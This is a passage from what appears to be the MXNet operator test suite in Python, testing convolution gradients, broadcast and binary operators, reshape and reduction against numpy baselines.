kernel=kernel, stride=stride, pad=pad, no_bias=no_bias)
for req_kind in reqs:
# Binding args for conv with possible dependent gradients
base_args = {
'x': mx.nd.random.normal(shape=x_shape, ctx=ctx),
'w': mx.nd.random.normal(shape=w_shape, ctx=ctx),
'b': mx.nd.random.normal(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
args1 = copy.deepcopy(base_args)
grad1 = {
'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
grad_req1 = [req_kind] * 3
grad_req1 = dict(zip(var_names, grad_req1))
exe1 = conv.bind(ctx, args1, args_grad=grad1, grad_req=grad_req1)
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
for x_req, w_req, b_req in itertools.product(reqs, repeat=3):
# Binding args for conv with independent gradients
args2 = copy.deepcopy(base_args) # Deepcopy the same params of `exe1`
grad2 = {
'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
grad_req2 = {"x": x_req, "w": w_req, "b": b_req}
exe2 = conv.bind(ctx, args2, args_grad=grad2, grad_req=grad_req2)
exe2.forward(is_train=True)
np.testing.assert_allclose(exe1.outputs[0].asnumpy(),
exe2.outputs[0].asnumpy(), rtol=rtol, atol=atol)
exe2.backward(exe2.outputs[0])
for var_name in var_names:
if var_name == "b" and no_bias:
continue
if grad_req2[var_name] == "null":
exe2_var_grad = grad2[var_name].asnumpy()
np.testing.assert_allclose(exe2_var_grad,
np.zeros_like(exe2_var_grad), rtol=rtol, atol=atol)
if grad_req2[var_name] != grad_req1[var_name]:
continue
np.testing.assert_allclose(args1[var_name].asnumpy(),
args2[var_name].asnumpy(), rtol=rtol, atol=atol)
np.testing.assert_allclose(grad1[var_name].asnumpy(),
grad2[var_name].asnumpy(), rtol=rtol, atol=atol)
def gen_broadcast_data(idx):
# Manually set test cases
binary_op_data_shape = np.array(
[[[2, 5, 1, 30, 7], [1, 5, 448, 30, 1]],
[[10, 49, 1, 77, 17], [10, 1, 2, 1, 17]],
[[13, 2, 65, 2, 1], [13, 1, 65, 1, 225]],
[[9, 434, 4, 2, 37], [9, 1, 4, 1, 37]],
[[2, 52, 1, 4, 1], [1, 52, 60, 1, 37]],
[[1, 23, 7, 122, 50], [2, 1, 7, 1, 50]],
[[1, 17, 1, 5, 1], [22, 1, 2, 1, 28]],
[[29, 1, 2, 1, 8], [29, 22, 1, 130, 1]],
[[2, 36, 1, 427, 3], [1, 36, 11, 427, 1]],
[[1, 2, 1, 100, 7], [1, 2, 448, 100, 1]],
[[1, 2, 495, 77, 7], [1, 2, 1, 1, 7]],
[[1, 43, 65, 2, 1], [1, 43, 65, 1, 225]],
[[1, 92, 434, 2, 2], [1, 92, 1, 2, 2]],
[[1, 92, 1, 4, 1], [1, 92, 134, 1, 17]],
[[1, 53, 2, 122, 143], [1, 1, 2, 1, 143]],
[[1, 179, 1, 87, 17], [1, 179, 1, 1, 17]],
[[1, 1, 17, 5, 1], [1, 22, 1, 1, 28]],
[[1, 2, 1, 1, 8], [1, 2, 52, 430, 1]],
[[1, 163, 1, 22, 3], [1, 163, 116, 22, 1]],
[[1, 1, 44, 30, 7], [1, 1, 44, 30, 1]],
[[1, 1, 1, 1, 28], [1, 127, 1, 5, 28]],
[[1, 2, 394, 38, 1], [1, 2, 394, 38, 16]],
[[1, 10, 49, 77, 17], [1, 1, 1, 1, 17]],
[[1, 431, 6, 2, 225], [1, 1, 6, 2, 225]],
[[1, 15, 1, 28, 1], [1, 15, 1, 28, 463]],
[[1, 129, 2, 48, 96], [1, 129, 2, 1, 1]],
[[1, 1, 403, 17, 2], [1, 44, 403, 17, 2]],
[[1, 1, 65, 2, 22], [1, 1, 65, 1, 1]],
[[1, 24, 103, 17, 18], [1, 24, 1, 1, 1]],
[[1, 1, 1, 1, 2], [1, 24, 194, 50, 1]],
[[1, 1, 107, 84, 9], [1, 1, 1, 1, 1]]])
if idx < binary_op_data_shape.shape[0]:
l_shape = binary_op_data_shape[idx][0]
r_shape = binary_op_data_shape[idx][1]
else:
# Generate random data that has ndim between 1-7 and all the shape dims between 1-5
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
l_same_dim = np.random.randint(0, 5)
r_same_dim = np.random.randint(0, 5)
l_axis_flags = np.random.randint(0, 2, size=ndim)
r_axis_flags = np.random.randint(0, 2, size=ndim)
if l_same_dim == 4:
l_axis_flags = np.ones(ndim)
if r_same_dim == 4:
r_axis_flags = np.ones(ndim)
l_shape = shape.copy()
r_shape = shape.copy()
l_shape[np.where(l_axis_flags == 0)] = 1
r_shape[np.where(r_axis_flags == 0)] = 1
return [np.random.random(l_shape), np.random.random(r_shape)]
def gen_broadcast_data_int(idx):
d = gen_broadcast_data(idx);
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
def gen_binary_data(dummy):
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
#print("gen shape {}".format(shape))
return [np.random.random(shape), np.random.random(shape)]
def gen_binary_data_int(dummy):
d = gen_binary_data(dummy);
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
def check_binary_op_forward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5, mx_nd_func=None):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
y = symbol.bind(default_context(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])})
y.forward(is_train=True)
y = y.outputs[0].asnumpy()
x = baseline(d[0], d[1]).astype(y.dtype)
#np.set_printoptions(precision=20)
a = d[0]
b = d[1]
#print("a: {} {}".format(a.dtype, a))
#print("a: {} {}".format(b.dtype, b))
#print("x: {} {}".format(x.dtype, x))
#print("y: {} {}".format(y.dtype, y))
if mx_nd_func is not None:
d0 = mx.nd.array(d[0], dtype=d[0].dtype)
d1 = mx.nd.array(d[1], dtype=d[1].dtype)
assert_almost_equal(y, mx_nd_func(d0, d1).asnumpy(), rtol=rtol, atol=atol)
idx = np.abs(x-y) > atol+rtol*np.abs(x)
if idx.any():
import binascii
np.set_printoptions(precision=20)
logging.error('found precision problem:')
d[0] = np.broadcast_to(d[0], x.shape)
d[1] = np.broadcast_to(d[1], x.shape)
logging.error('input a: {}'.format(d[0][idx]))
logging.error('input b: {}'.format(d[1][idx]))
logging.error("output x: {} {}".format(x.dtype, x))
logging.error("output y: {} {}".format(y.dtype, y))
def ftohex(xs):
import struct
return list(map(lambda x: binascii.hexlify(struct.pack('d', x)), xs.flatten()))
logging.error('output x in baseline(a, b): {}'.format(x[idx]))
logging.error('output y in symbol(a, b): {}'.format(y[idx]))
logging.error('output x in baseline(a,b) hex: {}'.format(ftohex(x[idx])))
logging.error('output y in symbol(a,b) hex: {}'.format(ftohex(y[idx])))
logging.error('input a hex: {}'.format(ftohex(d[0][idx])))
logging.error('input a hex: {}'.format(ftohex(d[1][idx])))
logging.error('diff: {}'.format(np.abs(x-y)[idx] - atol-rtol*np.abs(x)[idx]))
assert_allclose(y, x, rtol=rtol, atol=atol)
def check_binary_op_backward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
out = np.random.random((d[0] + d[1]).shape)
def reduce_op(shape, x):
if shape == x.shape:
return x
keepdims_shape = list(x.shape)
for i in range(len(shape)):
if x.shape[i] != shape[i]:
keepdims_shape[i] = 1
x = np.sum(x, axis=i).reshape(keepdims_shape)
return x
baseline_grad1, baseline_grad2 = baseline(out, d[0], d[1])
x_1 = reduce_op(d[0].shape, baseline_grad1)
x_2 = reduce_op(d[1].shape, baseline_grad2)
y_1 = mx.nd.empty(d[0].shape)
y_2 = mx.nd.empty(d[1].shape)
y = symbol.bind(default_context(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])},
args_grad=[y_1, y_2])
y.forward(is_train=True)
y.backward([mx.nd.array(out)])
assert_allclose(y_1.asnumpy(), x_1, rtol=rtol, atol=atol)
assert_allclose(y_2.asnumpy(), x_2, rtol=rtol, atol=atol)
@with_seed()
def test_binary_op():
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = a + b
check_binary_op_forward(c, lambda a, b: a + b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_binary_data)
def test_bminus(a, b):
c = a - b
check_binary_op_forward(c, lambda a, b: a - b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_binary_data)
def test_bmul(a, b):
c = a * b
check_binary_op_forward(c, lambda a, b: a * b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_binary_data)
def test_bdiv(a, b):
c = a / b
check_binary_op_forward(c, lambda a, b: a / b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_binary_data)
def test_bmod(a, b):
# Python and numpy operate only in double so to avoid numerical errors we have to use
# doubles as well. This was a flaky test before when using float32. seed 1688524483, 1768433044
#c = a % b
c = mx.sym.cast(a, dtype='float64') % mx.sym.cast(b, dtype='float64')
# '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
check_binary_op_forward(c, lambda a, b: np.float32(a) % np.float32(b), gen_binary_data, rtol=0, atol=0)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.cast(a, dtype='int32') % mx.sym.cast(b, dtype='int32')
check_binary_op_forward(c, lambda a, b: a % b, gen_binary_data_int)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data_int)
def test_bpow(a, b):
c = a ** b
check_binary_op_forward(c, lambda a, b: a ** b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_binary_data)
def test_bneq(a, b):
c = a != b
# '!=' is sensitive to the precision of the comparison. Force numpy to match mxnet's float32.
# Issue exposed with seed 1644387363
check_binary_op_forward(c, lambda a, b: (np.float32(a) != np.float32(b)).astype(a.dtype), gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bneq(a, b)
@with_seed()
def test_broadcast_binary_op():
def check_bmaxmin_gradient(test_sym, x, y, delta, rtol, atol):
"""This function ensures that checking the numerical gradient of
broadcast_max/min is not crossing the boundary y=x where there
is no gradient definition at those sigularities."""
x_max = np.max(x)
y = x_max + 2 * delta + np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
x_min = np.min(x)
y = x_min - 2 * delta - np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = mx.sym.broadcast_plus(a, b)
check_binary_op_forward(c, lambda a, b: a + b, gen_broadcast_data, mx_nd_func=mx.nd.add)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_broadcast_data)
def test_bminus(a, b):
c = mx.sym.broadcast_minus(a, b)
check_binary_op_forward(c, lambda a, b: a - b, gen_broadcast_data, mx_nd_func=mx.nd.subtract)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_broadcast_data)
def test_bmul(a, b):
c = mx.sym.broadcast_mul(a, b)
check_binary_op_forward(c, lambda a, b: a * b, gen_broadcast_data, mx_nd_func=mx.nd.multiply)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_broadcast_data)
def test_bdiv(a, b):
c = mx.sym.broadcast_div(a, b)
check_binary_op_forward(c, lambda a, b: a / b, gen_broadcast_data, mx_nd_func=mx.nd.divide)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_broadcast_data)
def test_bmod(a_, b_):
# Python and numpy operate only in double so to avoid numerical errors we have to use
# doubles as well. This was a flaky test before when using float32. seed 1688524483, 1768433044
a = mx.sym.cast(a_, dtype='float64')
b = mx.sym.cast(b_, dtype='float64')
# '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
c = mx.sym.broadcast_mod(a, b)
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data, atol=1, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.broadcast_mod(mx.sym.cast(a, dtype='int32'), mx.sym.cast(b, dtype='int32'))
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data_int, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bpow(a, b):
c = mx.sym.broadcast_power(a, b)
check_binary_op_forward(c, lambda a, b: a ** b, gen_broadcast_data, mx_nd_func=mx.nd.power)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_broadcast_data)
def test_bequal(a, b):
c = mx.sym.broadcast_equal(a, b)
check_binary_op_forward(c, lambda a, b: (a == b).astype(a.dtype), gen_broadcast_data_int,
mx_nd_func=mx.nd.equal)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bmax(a, b):
c = mx.sym.broadcast_maximum(a, b)
check_binary_op_forward(c, lambda x, y: np.maximum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.maximum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bmin(a, b):
c = mx.sym.broadcast_minimum(a, b)
check_binary_op_forward(c, lambda x, y: np.minimum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.minimum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_band(a, b):
c = mx.sym.broadcast_logical_and(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_and(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_and)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bor(a, b):
c = mx.sym.broadcast_logical_or(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_or(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_or)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bxor(a, b):
c = mx.sym.broadcast_logical_xor(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_xor(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_xor)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bequal(a, b)
test_bmax(a, b)
test_bmin(a, b)
test_band(a, b)
test_bor(a, b)
test_bxor(a, b)
@with_seed()
def test_run_convolution_dilated_impulse_response(dil=(1,1), kernel_shape=(3,3), verbose=False):
dim = len(dil)
assert(len(kernel_shape) == dim)
# Input for spike response
data_size = 33
data_shape = (1, 1) + (data_size,) * dim
center = (0,0) + (data_size // 2,) * dim
spike_imgs = np.zeros(shape=data_shape, dtype=np.float32)
spike_imgs[center] = 1.0
spike_img = mx.nd.array(spike_imgs)
spike_img2 = mx.nd.array(spike_imgs)
kernel_weights = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel_weights2 = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel = mx.symbol.Variable('kernel')
in_img = mx.symbol.Variable('input')
net = mx.symbol.Convolution(in_img, num_filter=1,kernel=kernel_shape, dilate=dil, no_bias="true", name='test_convolution')
net.list_arguments()
be = net.bind(default_context(), args={ 'input' : spike_img, 'test_convolution_weight' : kernel_weights},
args_grad={'input' : spike_img2, 'test_convolution_weight' : kernel_weights2 } )
be.forward(True)
out_o = be.outputs[0].asnumpy()
ndo = be.outputs[0]
out_grads = np.zeros(shape=be.outputs[0].shape, dtype=np.float32)
out_grads[center] = 1.0
out_grad = mx.nd.array(out_grads)
be.backward([out_grad])
vgrad = be.grad_arrays[0].asnumpy()
out = out_o.reshape(out_o.shape[2:])
nz_loc = np.nonzero(out)
assert_allclose(np.sum(out),np.prod(kernel_shape),atol=1e-5)
assert_allclose(np.sum(vgrad),np.prod(kernel_shape),atol=1e-5)
# Now check whether the input gradient was computed correctly
input_grad = mx.nd.array(vgrad)
be = net.bind(default_context(), args={ 'input' : input_grad, 'test_convolution_weight' : kernel_weights})
be.forward(True)
out_o = be.outputs[0].asnumpy()
assert_allclose(out_o[center],np.prod(kernel_shape),atol=1e-5)
rnd_kernel_s = np.random.uniform(low=0.0, high=1.0, size=tuple([1,1]+list(kernel_shape))).astype(np.float32)
impulse_error = mx.nd.array(out_o/np.sum(out_o)) # This should be 1.0 at [0,0,16,16]
rnd_kernel = mx.nd.array(rnd_kernel_s)
rnd_kernel2 = mx.nd.array(rnd_kernel_s)
white_in = mx.nd.ones(shape=data_shape)
white_in2 = mx.nd.ones(shape=data_shape)
be = net.bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : rnd_kernel},
args_grad={'input' : white_in2, 'test_convolution_weight' : rnd_kernel2 } )
be.forward(True)
be.backward([impulse_error])
out_orig = be.outputs[0].asnumpy()
kernel_gradient = be.grad_arrays[1].asnumpy()
dkernel = mx.nd.array(rnd_kernel_s + kernel_gradient)
be = net.bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : dkernel})
be.forward(True)
out = be.outputs[0].asnumpy()
# Now do a simple check of the kernel gradient
assert(out[center] - np.sum(kernel_gradient) - out_orig[center] < 0.001)
@with_seed()
def test_convolution_dilated_impulse_response():
# 1D
for dil in [ (1,), (2,), (3,) ]:
for ks in [ (1,), (2,), (3,), (4,)]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
# 2D
for dil in [ (1,1), (2,2), (3,3) ]:
for ks in [ (3,3), (4,4), (2,3), (3,2), (1,1) ]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
# 3D
for dil in [ (1,1,1), (2,2,2), (3,3,3) ]:
for ks in [ (3,3,3), (4,4,4), (2,3,4), (3,2,4), (1,1,1) ]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
@with_seed()
@pytest.mark.serial
@pytest.mark.parametrize('src_shape,shape_args,reverse,dst_shape', [
((2, 3, 5, 5), (0, -1), False, (2, 75)),
((2, 3, 5, 5), (0, 0, -1), False, (2, 3, 25)),
((5, 3, 4, 5), (0, -1, 0), False, (5, 15, 4)),
((2, 3, 5, 4), (-1, 0, 0), False, (8, 3, 5)),
((2, 3, 5, 5), (0, 0, 0, 0), False, (2, 3, 5, 5)),
((2, 4, 5, 3), (-1, 2, 2, 1), False, (30, 2, 2, 1)),
((2, 3, 5, 6), (-2,), False, (2, 3, 5, 6)),
((2, 3, 5, 6), (6, 1, -2), False, (6, 1, 5, 6)),
((2, 3, 5, 6), (-3, -3), False, (6, 30)),
((2, 3, 5, 6), (-3, -1), False, (6, 30)),
((64,), (-4, 16, 4), False, (16, 4)),
((64,), (-4, 16, -1), False, (16, 4)),
((64, 1, 2, 3), (-4, 16, -1, -2), False, (16, 4, 1, 2, 3)),
((2, 3, 5, 5), (0, -1), True, (5, 30)),
((2, 3, 5, 5), (0, 0, -1), True, (3, 5, 10)),
((5, 3, 4, 5), (0, -1, 0), True, (3, 20, 5)),
((2, 3, 5, 4), (-1, 0, 0), True, (6, 5, 4)),
((2, 3, 4, 5), (3, -1, 0), True, (3, 8, 5)),
((2, 3, 5, 5), (5, 3, 0, -1), True, (5, 3, 5, 2)),
((2, 3, 5, 5), (0, 0, 0, 0), True, (2, 3, 5, 5)),
((2, 3, 5, 6), (-2,), True, (2, 3, 5, 6)),
((2, 3, 5, 6), (-2, 1, 30), True, (2, 3, 1, 30)),
((2, 3, 5, 6), (-3, -3), True, (6, 30)),
((64,), (16, 4, -4), True, (16, 4)),
((64,), (16, -1, -4), True, (16, 4)),
((1, 2, 3, 64), (-2, -1, 16, -4), True, (1, 2, 3, 4, 16))
])
def test_reshape_new(src_shape, shape_args, reverse, dst_shape):
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, shape=shape_args, reverse=reverse)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(data=src_shape)
assert output_shape[0] == dst_shape, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
dat_npy = np.random.rand(*src_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net.simple_bind(default_context(), data=src_shape)
exe.arg_dict['data'][:] = dat_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - dat_npy.reshape(dst_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['data'].asnumpy() - grad_npy.reshape(src_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
for i in range(len(src_shape)):
holdout_src_shape = list(src_shape)
holdout_src_shape[i] = 0
holdout_src_shape = tuple(holdout_src_shape)
net = mx.sym.Variable('data')
net = mx.sym.elemwise_add(net.reshape(shape_args, reverse=reverse), mx.sym.ones(shape=dst_shape))
input_shape, output_shape, __ = net.infer_shape(data=holdout_src_shape)
assert output_shape[0] == dst_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
assert input_shape[0] == src_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
@with_seed()
def test_reshape_old():
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, target_shape=(2, 0))
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(data=(2, 3, 5, 5))
assert(output_shape[0] == (2, 75))
# Test for Flatten
data = mx.sym.Variable("data")
net = mx.sym.Flatten(data)
exe = net.simple_bind(ctx=default_context(), data=(5, 4, 3, 7))
data_npy = np.random.normal(size=(5, 4, 3, 7))
out_grad_npy = np.random.normal(size=(5, 4 * 3 * 7))
outputs = exe.forward(is_train=True, data=data_npy)[0].asnumpy()
assert_allclose(outputs, data_npy.reshape((5, 4 * 3 * 7)))
exe.backward(out_grads=[mx.nd.array(out_grad_npy, ctx=default_context())])
assert_allclose(exe.grad_arrays[0].asnumpy(), out_grad_npy.reshape((5, 4, 3, 7)))
@with_seed()
def test_reshape_like():
def test_reshape_like_new(lhs_shape, rhs_shape, lbeg, lend, rbeg, rend, dst_shape):
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs, lhs_begin=lbeg, lhs_end=lend, rhs_begin=rbeg, rhs_end=rend)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(lhs=lhs_shape, rhs=rhs_shape)
assert output_shape[0] == dst_shape, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
lhs_npy = np.random.rand(*lhs_shape)
rhs_npy = np.random.rand(*rhs_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net.simple_bind(default_context(), lhs=lhs_shape, rhs=rhs_shape)
exe.arg_dict['lhs'][:] = lhs_npy
exe.arg_dict['rhs'][:] = rhs_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - lhs_npy.reshape(dst_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['lhs'].asnumpy() - grad_npy.reshape(lhs_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
# Test new api (Using shape)
test_cases = [
[(30,), (15,2,4), 0, None, 0, 2, (15,2)],
[(30,), (15,2,4), None, 1, None, 2, (15,2)],
[(30,7), (15,2,4), 0, 1, 0, 2, (15,2,7)],
[(3,5), (1,15,4), 0, 2, 1, 2, (15,)],
[(3,5), (1,15,4), 0, None, 1, -1, (15,)],
[(30,12), (4,2,2,3), -1, None, 1, None, (30,2,2,3)],
[(1,1,7,3,1,1), (81,1,1,21), 1, -1, 1, None, (1,1,1,21,1)]
]
# for test_case in test_cases:
for test_case in test_cases:
test_reshape_like_new(*test_case)
# Test old api
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(lhs=(40, 30), rhs=(30,20,2))
assert(output_shape[0] == (30,20,2))
@with_seed()
def test_reduce():
sample_num = 500
def test_reduce_inner(numpy_reduce_func, numpy_reduce_grad_func, mx_reduce_sym, nan_prob=0,
test_exclude=True, test_none_axis=False):
for i in range(sample_num):
# Generate random data that has ndim between 1-7 and all the shape dims between 1-5
# Insert a NaN with probability equal to nan_prob
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
axis_num = np.random.randint(0, ndim, size=1)
axis_flags = np.random.randint(0, 2, size=ndim)
if test_exclude:
exclude = np.random.randint(0, 2)
else:
exclude = False
axes = []
for (axis, flag) in enumerate(axis_flags):
if flag:
axes.append(axis)
if 0 == len(axes):
axes = None
elif 1 == len(axes):
axes = axes[0]
else:
axes = tuple(axes)
keepdims = np.random.randint(0, 2)
a = mx.symbol.Variable('a')
if axes is None:
if test_none_axis:
b = mx_reduce_sym(a, keepdims=keepdims, axis=axes)
else:
b = mx_reduce_sym(a, keepdims=keepdims)
elif exclude and isinstance(axes, tuple) and len(axes) < ndim:
naxes = [i for i in range(ndim) if i not in axes]
b = mx_reduce_sym(a, axis=naxes, keepdims=keepdims, exclude=True)
else:
b = mx_reduce_sym(a, axis=axes, keepdims=keepdims)
dat_npy = np.random.rand(*shape)
# Test with both negative and positive values (randomly). Avoid having both in the same
# test, which can be problematic for error checking due to near-zero values.
if np.random.rand() > 0.5:
dat_npy = -dat_npy
if nan_prob > 0:
dat_npy[np.random.rand(*shape) < nan_prob] = np.nan
sum_groundtruth = np.array(numpy_reduce_func(dat_npy, axis=axes, keepdims=keepdims))
if sum_groundtruth.shape == ():
sum_groundtruth = np.array([sum_groundtruth])
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.array(np.random.rand(*sum_groundtruth.shape))
keepdim_shape = np_reduce(dat_npy, axes, 1, np.sum).shape
grad_groundtruth = numpy_reduce_grad_func(outgrad=outgrad_npy, data=dat_npy,
outdata=sum_groundtruth,
axis=axes, keepdims=keepdims,
keepdim_shape=keepdim_shape)
net = b.bind(default_context(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
equal_forward = almost_equal_ignore_nan(net.outputs[0].asnumpy(), sum_groundtruth, 1E-4, 1E-4)
assert equal_forward
net.backward(out_grads=mx.nd.array(outgrad_npy))
bc_grad_groundtruth = np.broadcast_to(grad_groundtruth, grad_nd.shape)
equal_backward = almost_equal_ignore_nan(grad_nd.asnumpy(), bc_grad_groundtruth, 1E-4, 1E-4)
assert equal_backward
test_none_axis = [True, False]
for test_none in test_none_axis:
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.sum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape),
mx.symbol.sum, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.mean),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
